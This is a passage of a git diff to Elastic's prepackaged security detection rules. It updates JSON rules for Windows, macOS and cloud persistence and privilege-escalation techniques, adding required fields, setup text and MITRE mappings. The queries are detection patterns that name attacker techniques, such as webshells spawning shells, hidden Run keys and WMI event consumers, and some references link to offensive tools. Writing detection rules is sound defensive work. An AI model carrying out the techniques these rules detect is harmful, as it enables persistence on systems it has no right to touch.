versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"sdbinst.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -72,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_atom_init_file_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_atom_init_file_modification.json index 0977d8310cf6b..4b71a76459d83 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_atom_init_file_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_atom_init_file_modification.json @@ -16,6 +16,33 @@ "https://github.com/D00MFist/PersistentJXA/blob/master/AtomPersist.js", "https://flight-manual.atom.io/hacking-atom/sections/the-init-file/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "b4449455-f986-4b5a-82ed-e36b129331f7", "severity": "low", @@ -26,7 +53,24 @@ "Threat Detection", "Persistence" ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_bits_job_notify_command.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_bits_job_notify_command.json index 8625a3bdedc6a..7a09b0fadbf5b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_bits_job_notify_command.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_bits_job_notify_command.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via BITS Job Notify Cmdline", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.parent.args : \"BITS\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\WINDOWS\\\\system32\\\\directxdatabaseupdater.exe\")\n", "references": [ "https://pentestlab.blog/2019/10/30/persistence-bits-jobs/", @@ -20,8 +20,31 @@ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-setnotifycmdline", "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-2" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_hidden_run_key_valuename.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_hidden_run_key_valuename.json index d7b66aa33106c..b19415fcdeff7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_hidden_run_key_valuename.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_hidden_run_key_valuename.json @@ -12,14 +12,22 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "/* Registry Path ends with backslash */\nregistry where /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\", \n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\", \n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "note": "", + "query": "/* Registry Path ends with backslash */\nregistry where /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -54,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_lsa_security_support_provider_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_lsa_security_support_provider_registry.json index c61fe5b8a17d5..de098226aca92 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_lsa_security_support_provider_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_lsa_security_support_provider_registry.json @@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Installation of Security Support Provider", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where\n registry.path : (\"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\", \n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "note": "", + "query": "registry where\n registry.path : (\"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_telemetrycontroller_scheduledtask_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_telemetrycontroller_scheduledtask_hijack.json index e852ed1e330be..cc2e5ad49b385 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_telemetrycontroller_scheduledtask_hijack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_telemetrycontroller_scheduledtask_hijack.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via TelemetryController Scheduled Task Hijack", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"CompatTelRunner.exe\" and process.args : \"-cv*\" and\n not process.name : (\"conhost.exe\",\n \"DeviceCensus.exe\",\n \"CompatTelRunner.exe\",\n \"DismHost.exe\",\n \"rundll32.exe\",\n \"powershell.exe\")\n", "references": [ "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/?utm_content=131234033&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_update_orchestrator_service_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_update_orchestrator_service_hijack.json index 23e80df260e08..c4a8c939bf4db 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_update_orchestrator_service_hijack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_update_orchestrator_service_hijack.json @@ -12,20 +12,44 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\n \"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"C:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"C:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"C:\\\\Windows\\\\System32\\\\WerMgr.exe\"\n )\n", + "note": "", + "query": "process where event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", "Host", "Windows", "Threat Detection", - "Persistence" + "Persistence", + "CVE-2020-1313" ], "threat": [ { @@ -53,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_windows_management_instrumentation_event_subscription.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_windows_management_instrumentation_event_subscription.json index 181a51ee552b1..6e81d9f24165c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_windows_management_instrumentation_event_subscription.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_windows_management_instrumentation_event_subscription.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via WMI Event Subscription", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"wmic.exe\" or process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"create\" and\n process.args : (\"ActiveScriptEventConsumer\", \"CommandLineEventConsumer\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_wmi_stdregprov_run_services.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_wmi_stdregprov_run_services.json index d35fbf97ee846..2f78701a34d72 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_wmi_stdregprov_run_services.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_wmi_stdregprov_run_services.json @@ -14,6 +14,23 @@ "references": [ "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov" ], + "required_fields": [ + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6", "severity": "high", @@ -77,5 +94,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_webshell_detection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_webshell_detection.json index 0839cf1c04b78..06852792e15bb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_webshell_detection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_webshell_detection.json @@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Webshell Detection: Script Process Child of Common Web Processes", - "note": "## Triage and analysis\n\nDetections should be investigated to identify if the activity corresponds to legitimate activity. As this rule detects post-exploitation process activity, investigations into this should be prioritized.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n process.parent.name : (\"w3wp.exe\", \"httpd.exe\", \"nginx.exe\", \"php.exe\", \"php-cgi.exe\", \"tomcat.exe\") and \n process.name : (\"cmd.exe\", \"cscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"wmic.exe\", \"wscript.exe\")\n", + "note": "## Triage and analysis\n\nDetections should be investigated to identify if the activity corresponds to legitimate activity. As this rule detects post-exploitation process activity, investigations into this should be prioritized.", + "query": "process where event.type == \"start\" and\n process.parent.name : (\"w3wp.exe\", \"httpd.exe\", \"nginx.exe\", \"php.exe\", \"php-cgi.exe\", \"tomcat.exe\") and\n process.name : (\"cmd.exe\", \"cscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"wmic.exe\", \"wscript.exe\")\n", "references": [ "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "2917d495-59bd-4250-b395-c29409b76086", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,5 +89,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_applescript_with_admin_privs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_applescript_with_admin_privs.json index 8d41551fa4f24..62225f6495e5c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_applescript_with_admin_privs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_applescript_with_admin_privs.json @@ -11,13 +11,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Apple Scripting Execution with Administrator Privileges", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*with administrator privileges\"\n", "references": [ "https://discussions.apple.com/thread/2266150" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -61,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_aws_suspicious_saml_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_aws_suspicious_saml_activity.json index de17b7a5b30a1..140f6bf2aa573 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_aws_suspicious_saml_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_aws_suspicious_saml_activity.json @@ -14,14 +14,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS SAML Activity", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:(iam.amazonaws.com or sts.amazonaws.com) and event.action:(Assumerolewithsaml or \nUpdateSAMLProvider) and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:(iam.amazonaws.com or sts.amazonaws.com) and event.action:(Assumerolewithsaml or\nUpdateSAMLProvider) and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "979729e7-0c52-4c4c-b71e-88103304a79f", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -72,5 +102,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_azure_kubernetes_rolebinding_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_azure_kubernetes_rolebinding_created.json index d0685caeaeb06..12cbec0c58573 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_azure_kubernetes_rolebinding_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_azure_kubernetes_rolebinding_created.json @@ -11,14 +11,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Kubernetes Rolebindings Created", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n\t(\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE\" or\n\t \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE\") and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n\t(\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE\" or\n\t \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE\") and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1c966416-60c1-436b-bfd0-e002fddbfd89", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -41,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_error_audit_event_promotion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_error_audit_event_promotion.json index 58bf98ce4e07f..eb6eb59860e92 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_error_audit_event_promotion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_error_audit_event_promotion.json @@ -14,14 +14,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "CyberArk Privileged Access Security Error", - "note": "## Config\n\nThe CyberArk Privileged Access Security (PAS) Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\nThis is a promotion rule for CyberArk error events, which are alertable events per the vendor.\nConsult vendor documentation on interpreting specific events.\n", + "note": "## Triage and analysis\n\nThis is a promotion rule for CyberArk error events, which are alertable events per the vendor.\nConsult vendor documentation on interpreting specific events.", "query": "event.dataset:cyberarkpas.audit and event.type:error\n", "references": [ "https://docs.cyberark.com/Product-Doc/OnlineHelp/PAS/Latest/en/Content/PASREF/Vault%20Audit%20Action%20Codes.htm?tocpath=Administration%7CReferences%7C_____3" ], + "related_integrations": [ + { + "package": "cyberarkpas", + "version": "2.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": 